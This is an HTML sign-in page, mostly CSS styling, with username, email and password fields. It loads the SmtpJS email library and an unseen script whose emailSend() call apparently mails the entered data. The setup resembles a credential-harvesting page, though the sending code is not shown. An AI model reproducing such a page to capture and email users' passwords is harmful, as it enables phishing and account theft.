<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Sign In</title>
    <style>
        *{
            box-sizing: border-box;
            font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
        }
        body{
            padding: 0;
            margin: 0;
            background: url(IMG.jpg) no-repeat;
            background-size: cover;
            
            min-height: 100vh;
            display: flex;
            justify-content: center;
            align-items: center;
        }
        .container{
            width: 350px;
            background: transparent;
            border-radius: 15px;
            padding: 20px;
            text-align: center;
            backdrop-filter: blur(20px);
            border: 2px #fff solid;
        }
        .container input{
            width: 100%;
            padding: 10px;
            border: none;
            margin-bottom: 20px;
            font-size: 16px;
            border-radius: 5px;
            outline: none;
        }
        h2{
            font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
            color: whitesmoke;
        }
        .btn{
            border: none;
            cursor: pointer;
            background: #3e76df;
            color: antiquewhite;
            font-size: 16px;
            margin: 15px 0;
            width: 100%;
            padding: 14px;
            border-radius: 5px;
        }
        .btn:hover{
            background: #1f7d5f;
            color: white;
            font-weight: bold;
        }
    </style>
</head>
<body>
    <div class="container">
        <h2>GET IN TOUCH</h2>
        <form onsubmit="emailSend(); reset(); return false"></form>
        <div>
            <input type="text" id="name" placeholder="Username" name="name" required>
            <input type="email" id="email" placeholder="Email" name="email" required>
            <input type="password" placeholder="Password" id="password" name="password" required>
            <button type="submit" class="btn">Log In</button>
        </div>
    </div>
    <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
    <script src="https://smtpjs.com/v3/smtp.js"></script>
    <script src="myscript.js"></script>
</body>
</html>